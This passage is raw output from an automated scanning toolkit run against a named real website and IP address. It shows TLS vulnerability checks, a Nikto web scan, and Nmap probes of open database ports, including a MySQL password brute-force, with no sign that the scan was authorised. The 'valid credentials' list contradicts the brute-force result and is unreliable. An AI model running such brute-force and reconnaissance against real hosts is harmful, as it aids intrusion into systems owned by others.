  3191. TLSv1.2: ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES256-GCM-SHA384
  3192. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES256-GCM-SHA384
  3193. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
  3194. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
  3195. DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-AES256-SHA256
  3196. DHE-RSA-AES256-SHA AES128-GCM-SHA256 AES256-GCM-SHA384
  3197. AES128-SHA256 AES256-SHA256 AES128-SHA AES256-SHA
  3198. DHE-RSA-CAMELLIA256-SHA CAMELLIA256-SHA DHE-RSA-CAMELLIA128-SHA
  3199. CAMELLIA128-SHA DES-CBC3-SHA
  3200.  
  3201.  
  3202.  Testing server defaults (Server Hello) 
  3203.  
  3204.  TLS extensions (standard) "renegotiation info/#65281"
  3205. "EC point formats/#11" "session ticket/#35"
  3206. "heartbeat/#15" "next protocol/#13172"
  3207. "application layer protocol negotiation/#16"
  3208.  Session Ticket RFC 5077 hint 600 seconds, session tickets keys seems to be rotated < daily
  3209.  SSL Session ID support yes
  3210.  Session Resumption Tickets: yes, ID: yes
  3211.  TLS clock skew Random values, no fingerprinting possible
  3212.  Signature Algorithm SHA256 with RSA
  3213.  Server key size RSA 2048 bits
  3214.  Fingerprint / Serial SHA1 05D5DA59C049FBEE09EC41A1AC4940E8486CB675 / 06A836FDD51B1B49AD03BADF3D066C3B2BA71A
  3215. SHA256 3F9C1B1598DFBE93CD689CA64F0D6104961CEB9AD1BC053A21D14B746A311E85
  3216.  Common Name (CN) *.webfaction.com
  3217.  subjectAltName (SAN) *.webfaction.com webfaction.com 
  3218.  Issuer Trustwave Organization Validation SHA256 CA, Level 1 (Trustwave Holdings, Inc. from US)
  3219.  Trust (hostname) certificate does not match supplied URI (same w/o SNI)
  3220.  Chain of trust Ok 
  3221.  EV cert (experimental) no
  3222.  Certificate Expiration 740 >= 60 days (2017-01-16 04:27 --> 2020-01-16 10:27 -0500)
  3223.  # of certificates provided 2
  3224.  Certificate Revocation List http://crl.trustwave.com/OVCA2_L1.crl
  3225.  OCSP URI http://ocsp.trustwave.com/
  3226.  OCSP stapling not offered
  3227.  OCSP must staple no
  3228.  DNS CAA RR (experimental) not offered
  3229.  Certificate Transparency no
  3230.  
  3231.  
  3232.  Testing HTTP header response @ "/" 
  3233.  
  3234.  HTTP Status Code  503 Service Temporarily Unavailable. Oh, didn't expect "503 Service Temporarily Unavailable"
  3235.  HTTP clock skew 0 sec from localtime
  3236.  Strict Transport Security --
  3237.  Public Key Pinning --
  3238.  Server banner nginx
  3239.  Application banner --
  3240.  Cookie(s) (none issued at "/") -- HTTP status 503 signals you maybe missed the web application
  3241.  Security headers --
  3242.  Reverse Proxy banner --
  3243.  
  3244.  
  3245.  Testing vulnerabilities 
  3246.  
  3247.  Heartbleed (CVE-2014-0160) not vulnerable (OK), timed out
  3248.  CCS (CVE-2014-0224) not vulnerable (OK)
  3249.  Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK)
  3250.  ROBOT not vulnerable (OK)
  3251.  Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
  3252.  Secure Client-Initiated Renegotiation not vulnerable (OK)
  3253.  CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
  3254.  BREACH (CVE-2013-3587) no HTTP compression (OK)  - only supplied "/" tested
  3255.  POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
  3256.  TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
  3257.  SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
  3258.  FREAK (CVE-2015-0204) not vulnerable (OK)
  3259.  DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
  3260. make sure you don't use this certificate elsewhere with SSLv2 enabled services
  3261. https://censys.io/ipv4?q=3F9C1B1598DFBE93CD689CA64F0D6104961CEB9AD1BC053A21D14B746A311E85 could help you to find out
  3262.  LOGJAM (CVE-2015-4000), experimental not vulnerable (OK): no DH EXPORT ciphers, no common primes detected
  3263.  BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES128-SHA
  3264. ECDHE-RSA-AES256-SHA
  3265. DHE-RSA-AES128-SHA
  3266. DHE-RSA-AES256-SHA AES128-SHA
  3267. AES256-SHA
  3268. DHE-RSA-CAMELLIA256-SHA
  3269. CAMELLIA256-SHA
  3270. DHE-RSA-CAMELLIA128-SHA
  3271. CAMELLIA128-SHA DES-CBC3-SHA 
  3272. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
  3273.  LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
  3274.  RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
  3275.  
  3276.  
  3277.  Testing 364 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength 
  3278.  
  3279. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
  3280. -----------------------------------------------------------------------------------------------------------------------------
  3281. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
  3282. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
  3283. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
  3284. x9f DHE-RSA-AES256-GCM-SHA384 DH 2048 AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
  3285. x6b DHE-RSA-AES256-SHA256 DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
  3286. x39 DHE-RSA-AES256-SHA DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
  3287. x88 DHE-RSA-CAMELLIA256-SHA DH 2048 Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
  3288. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
  3289. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
  3290. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
  3291. x84 CAMELLIA256-SHA RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
  3292. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
  3293. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
  3294. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
  3295. x9e DHE-RSA-AES128-GCM-SHA256 DH 2048 AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
  3296. x67 DHE-RSA-AES128-SHA256 DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
  3297. x33 DHE-RSA-AES128-SHA DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
  3298. x45 DHE-RSA-CAMELLIA128-SHA DH 2048 Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
  3299. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
  3300. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
  3301. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
  3302. x41 CAMELLIA128-SHA RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
  3303. x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
  3304.  
  3305.  
  3306.  Running client simulations via sockets 
  3307.  
  3308. Android 2.3.7 TLSv1.0 DHE-RSA-AES128-SHA, 2048 bit DH
  3309. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3310. Android 4.3 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3311. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3312. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3313. Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3314. Android 7.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3315. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3316. Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3317. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3318. Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3319. IE 6 XP No connection
  3320. IE 7 Vista TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3321. IE 8 XP TLSv1.0 DES-CBC3-SHA
  3322. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3323. IE 11 Win 7 TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  3324. IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  3325. IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES128-GCM-SHA256, 2048 bit DH
  3326. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3327. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3328. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3329. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  3330. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3331. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES128-SHA256, 256 bit ECDH (P-256)
  3332. Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3333. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3334. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3335. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3336. Java 6u45 No connection
  3337. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
  3338. Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3339. OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3340. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
  3341.  
  3342.  Done 2018-01-05 23:39:30 [ 245s] -->> 185.119.174.103:443 (benedictpatrick.com) <<--
  3343.  
  3344.  
  3345.  
  3346. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
  3347. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
  3348. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
  3349. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
  3350. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
  3351. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
  3352. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
  3353. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3354. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
  3355. ░ ░ 
  3356. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
  3357. + -- --=[Scan Complete!
  3358.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
  3359. + -- --=[Checking if X-Content options are enabled on benedictpatrick.com... 
  3360.  
  3361. + -- --=[Checking if X-Frame options are enabled on benedictpatrick.com... 
  3362.  
  3363. + -- --=[Checking if X-XSS-Protection header is enabled on benedictpatrick.com... 
  3364.  
  3365. + -- --=[Checking HTTP methods on benedictpatrick.com... 
  3366. HTTP/1.1 405 Not Allowed
  3367.  
  3368. + -- --=[Checking if TRACE method is enabled on benedictpatrick.com... 
  3369.  
  3370. + -- --=[Checking for META tags on benedictpatrick.com... 
  3371. <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  3372. <meta http-equiv="pragma" content="no-cache">
  3373.  
  3374. + -- --=[Checking for open proxy on benedictpatrick.com... 
  3375.  
  3376. + -- --=[Enumerating software on benedictpatrick.com... 
  3377. Server: nginx
  3378.  
  3379. + -- --=[Checking if Strict-Transport-Security is enabled on benedictpatrick.com... 
  3380.  
  3381. + -- --=[Checking for Flash cross-domain policy on benedictpatrick.com... 
  3382. <li>You created a new website record without the current subdomain (for example, <code>www</code>). Return to the control panel to add the current subdomain to the website record and refresh.</li>
  3383. <li>You added a new domain in the control panel but didn&#8217;t create a site record to link it with an application. Create a website record with the control panel and refresh.</li>
  3384. <li>Your website record is set for <span class="caps">HTTPS</span>, but you visited a <span class="caps">HTTP URL</span> (or vice-versa). Open the <span class="caps">URL</span> with the other protocol.</li>
  3385. <li>You tried to access your website by <span class="caps">IP</span> address. Access the website by domain name instead.</li>
  3386. <li>There is a problem with your account. Check the control panel for unresolved support tickets and check your email for recent messages from support@webfaction.com.</li>
  3387. </ul>
  3388. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  3389. <p id="outro">WebFaction provides modern hosting with friendly customer support. Visit our <a href="http://www.webfaction.com/">main website</a> for more information.</p>
  3390. </body>
  3391. </html>
  3392.  
  3393. + -- --=[Checking for Silverlight cross-domain policy on benedictpatrick.com... 
  3394. <li>You created a new website record without the current subdomain (for example, <code>www</code>). Return to the control panel to add the current subdomain to the website record and refresh.</li>
  3395. <li>You added a new domain in the control panel but didn&#8217;t create a site record to link it with an application. Create a website record with the control panel and refresh.</li>
  3396. <li>Your website record is set for <span class="caps">HTTPS</span>, but you visited a <span class="caps">HTTP URL</span> (or vice-versa). Open the <span class="caps">URL</span> with the other protocol.</li>
  3397. <li>You tried to access your website by <span class="caps">IP</span> address. Access the website by domain name instead.</li>
  3398. <li>There is a problem with your account. Check the control panel for unresolved support tickets and check your email for recent messages from support@webfaction.com.</li>
  3399. </ul>
  3400. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  3401. <p id="outro">WebFaction provides modern hosting with friendly customer support. Visit our <a href="http://www.webfaction.com/">main website</a> for more information.</p>
  3402. </body>
  3403. </html>
  3404.  
  3405. + -- --=[Checking for HTML5 cross-origin resource sharing on benedictpatrick.com... 
  3406.  
  3407. + -- --=[Retrieving robots.txt on benedictpatrick.com... 
  3408. <li>You created a new website record without the current subdomain (for example, <code>www</code>). Return to the control panel to add the current subdomain to the website record and refresh.</li>
  3409. <li>You added a new domain in the control panel but didn&#8217;t create a site record to link it with an application. Create a website record with the control panel and refresh.</li>
  3410. <li>Your website record is set for <span class="caps">HTTPS</span>, but you visited a <span class="caps">HTTP URL</span> (or vice-versa). Open the <span class="caps">URL</span> with the other protocol.</li>
  3411. <li>You tried to access your website by <span class="caps">IP</span> address. Access the website by domain name instead.</li>
  3412. <li>There is a problem with your account. Check the control panel for unresolved support tickets and check your email for recent messages from support@webfaction.com.</li>
  3413. </ul>
  3414. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  3415. <p id="outro">WebFaction provides modern hosting with friendly customer support. Visit our <a href="http://www.webfaction.com/">main website</a> for more information.</p>
  3416. </body>
  3417. </html>
  3418.  
  3419. + -- --=[Retrieving sitemap.xml on benedictpatrick.com... 
  3420. <li>You created a new website record without the current subdomain (for example, <code>www</code>). Return to the control panel to add the current subdomain to the website record and refresh.</li>
  3421. <li>You added a new domain in the control panel but didn&#8217;t create a site record to link it with an application. Create a website record with the control panel and refresh.</li>
  3422. <li>Your website record is set for <span class="caps">HTTPS</span>, but you visited a <span class="caps">HTTP URL</span> (or vice-versa). Open the <span class="caps">URL</span> with the other protocol.</li>
  3423. <li>You tried to access your website by <span class="caps">IP</span> address. Access the website by domain name instead.</li>
  3424. <li>There is a problem with your account. Check the control panel for unresolved support tickets and check your email for recent messages from support@webfaction.com.</li>
  3425. </ul>
  3426. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  3427. <p id="outro">WebFaction provides modern hosting with friendly customer support. Visit our <a href="http://www.webfaction.com/">main website</a> for more information.</p>
  3428. </body>
  3429. </html>
  3430.  
  3431. + -- --=[Checking cookie attributes on benedictpatrick.com... 
  3432.  
  3433. + -- --=[Checking for ASP.NET Detailed Errors on benedictpatrick.com... 
  3434. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  3435. <p>For more details, please see <a href="http://docs.webfaction.com/software/general.html#error-site-not-configured">Error: Site not configured</a>.</p>
  3436.  
  3437. 
  3438.  + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
  3439. - Nikto v2.1.6
  3440. ---------------------------------------------------------------------------
  3441. + Target IP: 185.119.174.103
  3442. + Target Hostname: benedictpatrick.com
  3443. + Target Port: 443
  3444. ---------------------------------------------------------------------------
  3445. + SSL Info: Subject: /CN=*.webfaction.com/O=Paragon Internet Group Ltd/L=Slough/ST=Berkshire/C=GB
  3446. Ciphers: ECDHE-RSA-AES128-GCM-SHA256
  3447. Issuer: /C=US/ST=Illinois/L=Chicago/O=Trustwave Holdings, Inc./CN=Trustwave Organization Validation SHA256 CA, Level 1/emailAddress=ca@trustwave.com
  3448. + Start Time: 2018-01-05 23:39:37 (GMT-5)
  3449. ---------------------------------------------------------------------------
  3450. + Server: nginx
  3451. + Server leaks inodes via ETags, header found with file /, fields: 0x588be613 0xcd2
  3452. + The anti-clickjacking X-Frame-Options header is not present.
  3453. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3454. + The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
  3455. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3456. + No CGI Directories found (use '-C all' to force check all possible dirs)
  3457. + Server is using a wildcard certificate: *.webfaction.com
  3458. + Hostname 'benedictpatrick.com' does not match certificate's names: *.webfaction.com
  3459. + OSVDB-48: /doc: The /doc directory is browsable. This may be /usr/doc.
  3460. + OSVDB-3092: /css: This might be interesting...
  3461. + 7449 requests: 3 error(s) and 9 item(s) reported on remote host
  3462. + End Time: 2018-01-06 00:28:59 (GMT-5) (2962 seconds)
  3463. ---------------------------------------------------------------------------
  3464. + 1 host(s) tested
  3465.  + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
  3466. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/benedictpatrick.com-port443.jpg
  3467.  + -- --=[Port 445 closed... skipping.
  3468.  + -- --=[Port 512 closed... skipping.
  3469.  + -- --=[Port 513 closed... skipping.
  3470.  + -- --=[Port 514 closed... skipping.
  3471.  + -- --=[Port 623 closed... skipping.
  3472.  + -- --=[Port 624 closed... skipping.
  3473.  + -- --=[Port 1099 closed... skipping.
  3474.  + -- --=[Port 1433 closed... skipping.
  3475.  + -- --=[Port 2049 closed... skipping.
  3476.  + -- --=[Port 2121 closed... skipping.
  3477.  + -- --=[Port 3306 opened... running tests...
  3478.  
  3479. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 00:30 EST
  3480. Nmap scan report for benedictpatrick.com (185.119.174.103)
  3481. Host is up (0.099s latency).
  3482. Other addresses for benedictpatrick.com (not scanned): 2a01:9cc0:0:1:1a:3:0:5e
  3483. rDNS record for 185.119.174.103: web564.webfaction.com
  3484.  
  3485. PORT STATE SERVICE VERSION
  3486. 3306/tcp open mysql MySQL 5.6.38-83.0
  3487. | mysql-brute:
  3488. | Accounts: No valid accounts found
  3489. |_ Statistics: Performed 37022 guesses in 600 seconds, average tps: 60.9
  3490. | mysql-enum:
  3491. | Valid usernames:
  3492. | admin:<empty> - Valid credentials
  3493. | netadmin:<empty> - Valid credentials
  3494. | guest:<empty> - Valid credentials
  3495. | user:<empty> - Valid credentials
  3496. | web:<empty> - Valid credentials
  3497. | sysadmin:<empty> - Valid credentials
  3498. | administrator:<empty> - Valid credentials
  3499. | webadmin:<empty> - Valid credentials
  3500. | root:<empty> - Valid credentials
  3501. | test:<empty> - Valid credentials
  3502. |_ Statistics: Performed 10 guesses in 1 seconds, average tps: 10.0
  3503. | mysql-info:
  3504. | Protocol: 10
  3505. | Version: 5.6.38-83.0
  3506. | Thread ID: 320971
  3507. | Capabilities flags: 63487
  3508. | Some Capabilities: LongColumnFlag, Speaks41ProtocolOld, Support41Auth, Speaks41ProtocolNew, IgnoreSigpipes, SupportsTransactions, InteractiveClient, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, FoundRows, LongPassword, ConnectWithDatabase, ODBCClient, SupportsCompression, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
  3509. | Status: Autocommit
  3510. | Salt: \(N2LjP4OqjBH$xRp]_G
  3511. |_ Auth Plugin Name: 84
  3512. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3513. Device type: general purpose
  3514. Running: Linux 3.X|4.X
  3515. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  3516. OS details: Linux 3.10 - 4.8, Linux 3.2 - 4.8
  3517. Network Distance: 11 hops
  3518.  
  3519. TRACEROUTE (using port 3306/tcp)
  3520. HOP RTT ADDRESS
  3521. 1 0.87 ms 192.168.1.254
  3522. 2 12.96 ms 10.135.18.1
  3523. 3 30.48 ms 75.154.223.222
  3524. 4 30.65 ms lag-113.ear3.NewYork1.Level3.net (4.15.212.245)
  3525. 5 97.72 ms ae-115-3501.edge3.London15.Level3.net (4.69.167.74)
  3526. 6 97.53 ms ae-225-3601.edge3.London15.Level3.net (4.69.167.90)
  3527. 7 103.53 ms 212.187.195.54
  3528. 8 100.54 ms 185.52.26.128
  3529. 9 99.57 ms 185.52.26.183
  3530. 10 102.09 ms uk.slo.prgn.b10.stk1.misp.co.uk (185.52.26.180)
  3531. 11 98.42 ms web564.webfaction.com (185.119.174.103)
  3532.  
  3533. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3534. Nmap done: 1 IP address (1 host up) scanned in 603.33 seconds
  3535.  + -- --=[Port 3310 closed... skipping.
  3536.  + -- --=[Port 3128 closed... skipping.
  3537.  + -- --=[Port 3389 closed... skipping.
  3538.  + -- --=[Port 3632 closed... skipping.
  3539.  + -- --=[Port 4443 closed... skipping.
  3540.  + -- --=[Port 5432 opened... running tests...
  3541.  
  3542. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-06 00:40 EST
  3543. Nmap scan report for benedictpatrick.com (185.119.174.103)
  3544. Host is up (0.098s latency).
  3545. Other addresses for benedictpatrick.com (not scanned): 2a01:9cc0:0:1:1a:3:0:5e
  3546. rDNS record for 185.119.174.103: web564.webfaction.com
  3547.  
  3548. PORT STATE SERVICE VERSION
  3549. 5432/tcp open postgresql PostgreSQL DB
  3550. | fingerprint-strings:
  3551. | SMBProgNeg:
  3552. | SFATAL
  3553. | C0A000
  3554. | Munsupported frontend protocol 65363.19778: server supports 1.0 to 3.0
  3555. | Fpostmaster.c
  3556. | L2010
  3557. |_ RProcessStartupPacket
  3558. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
  3559. SF-Port5432-TCP:V=7.60%I=7%D=1/6%Time=5A506158%P=x86_64-pc-linux-gnu%r(SMB
  3560. SF:ProgNeg,85,"E\0\0\0\x84SFATAL\0C0A000\0Munsupported\x20frontend\x20prot
  3561. SF:ocol\x2065363\.19778:\x20server\x20supports\x201\.0\x20to\x203\.0\0Fpos
  3562. SF:tmaster\.c\0L2010\0RProcessStartupPacket\0\0");
  3563. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  3564. Device type: general purpose
  3565. Running: Linux 3.X|4.X
  3566. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  3567. OS details: Linux 3.2 - 4.8
  3568. Network Distance: 11 hops
  3569.  
  3570. TRACEROUTE (using port 5432/tcp)
  3571. HOP RTT ADDRESS
  3572. 1 0.93 ms 192.168.1.254
  3573. 2 13.58 ms 10.135.18.1
  3574. 3 30.79 ms 75.154.223.222
  3575. 4 30.59 ms lag-113.ear3.NewYork1.Level3.net (4.15.212.245)
  3576. 5 97.80 ms ae-115-3501.edge3.London15.Level3.net (4.69.167.74)
  3577. 6 97.62 ms ae-117-3503.edge3.London15.Level3.net (4.69.167.82)
  3578. 7 102.38 ms 212.187.195.54
  3579. 8 100.64 ms 185.52.26.128
  3580. 9 99.65 ms 185.52.26.183
  3581. 10 140.96 ms uk.slo.prgn.b10.stk1.misp.co.uk (185.52.26.180)
  3582. 11 98.46 ms web564.webfaction.com (185.119.174.103)
  3583.  
  3584. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  3585. Nmap done: 1 IP address (1 host up) scanned in 609.82 seconds
  3586.  + -- --=[Port 5800 closed... skipping.
  3587.  + -- --=[Port 5900 closed... skipping.
  3588.  + -- --=[Port 5984 closed... skipping.
  3589.  + -- --=[Port 6000 closed... skipping.
  3590.  + -- --=[Port 6667 closed... skipping.
  3591.  + -- --=[Port 8000 closed... skipping.
  3592.  + -- --=[Port 8100 closed... skipping.
  3593.  + -- --=[Port 8080 closed... skipping.
  3594.  + -- --=[Port 8180 closed... skipping.
  3595.  + -- --=[Port 8443 closed... skipping.
  3596.  + -- --=[Port 8888 closed... skipping.
  3597.  + -- --=[Port 10000 closed... skipping.
  3598.  + -- --=[Port 16992 closed... skipping.
  3599.  + -- --=[Port 27017 closed... skipping.
  3600.  + -- --=[Port 27018 closed... skipping.
  3601.  + -- --=[Port 27019 closed... skipping.
  3602.  + -- --=[Port 28017 closed... skipping.
  3603.  + -- --=[Port 49152 closed... skipping.
  3604.  + -- ----------------------------=[Scanning For Common Vulnerabilities]=----- -- +
  3605. #########################################################################################
  3606. oooooo oooo .o. .oooooo..o ooooo ooo .oooooo.
  3607. `888. .8' .888. d8P' `Y8 `888' `8' d8P' `Y8b
  3608. `888. .8' .88888. Y88bo. 888 8 888 888
  3609. `888.8' .8' `888. `ZY8888o. 888 8 888 888
  3610. `888' .88ooo8888. `0Y88b 888 8 888 888
  3611. 888 .8' `888. oo .d8P `88. .8' `88b d88'
  3612. o888o o88o o8888o 88888888P' `YbodP' `Y8bood8P'
  3613. Welcome to Yasuo v2.3
  3614. Author: Saurabh Harit (@0xsauby) | Contribution & Coolness: Stephen Hall (@logicalsec)
  3615. #########################################################################################
  3616.  
  3617. I, [2018-01-06T00:50:43.935171 #29838] INFO -- : Initiating port scan
  3618. I, [2018-01-06T00:51:02.881409 #29838] INFO -- : Using nmap scan output file logs/nmap_output_2018-01-06_00-50-43.xml
  3619. I, [2018-01-06T00:51:02.883054 #29838] INFO -- : Discovered open port: 185.119.174.103:80
  3620. I, [2018-01-06T00:51:03.271722 #29838] INFO -- : Discovered open port: 185.119.174.103:443
  3621. I, [2018-01-06T00:51:04.063844 #29838] INFO -- : <<<Enumerating vulnerable applications>>>
  3622.  
  3623.  
  3624. --------------------------------------------------------
  3625. <<<Yasuo discovered following vulnerable applications>>>
  3626. --------------------------------------------------------
  3627. +----------+--------------------+-------------------+----------+----------+
  3628. | App Name | URL to Application | Potential Exploit | Username | Password |
  3629. +----------+--------------------+-------------------+----------+----------+
